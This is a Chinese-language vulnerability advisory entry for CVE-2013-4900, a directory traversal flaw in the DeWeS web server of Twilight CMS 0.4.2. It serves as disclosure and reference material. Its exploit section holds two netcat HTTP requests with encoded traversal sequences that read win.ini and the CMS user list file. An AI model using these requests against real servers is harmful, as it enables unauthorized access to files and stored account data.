Strata Twilight CMS DeWeS Web Server 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121827 漏洞类型 路径遍历
发布时间 2013-08-21 更新时间 2013-08-21
CVE编号 CVE-2013-4900 CNNVD-ID CNNVD-201308-354
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/38737
https://www.securityfocus.com/bid/61906
https://cxsecurity.com/issue/WLB-2013090077
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201308-354
|漏洞详情
TwilightCMS是俄罗斯StrataTechnologies公司的一套内容管理系统(CMS)。该系统提供新闻、论坛、电子商务等模块。TwilightCMS中使用的DeWeSWeb服务器0.4.2及之前的版本中存在目录遍历漏洞。远程攻击者可通过发送包含目录遍历序列(‘..%5c’)的HTTP请求中的‘../’序列,利用该漏洞读取任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/61906/info

Twilight CMS is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.

Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.

Twilight CMS 0.4.2 is vulnerable; other versions may also be affected. 

nc [www.example.com] 80 GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1

nc [www.example.com] 80 GET demosite/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/TwilightCMS/Sites/company_site/Data/user list.dat HTTP/1.1
|参考资料

来源:www.htbridge.com
链接:https://www.htbridge.com/advisory/HTB23167
来源:EXPLOIT-DB
名称:27777
链接:http://www.exploit-db.com/exploits/27777
来源:SECUNIA
名称:54404
链接:http://secunia.com/advisories/54404
来源:BUGTRAQ
名称:20130821PathTraversalinDeWeSWebServer(TwilightCMS)
链接:http://archives.neohapsis.com/archives/bugtraq/2013-08/0126.html
来源:BID
名称:61906
链接:http://www.securityfocus.com/bid/61906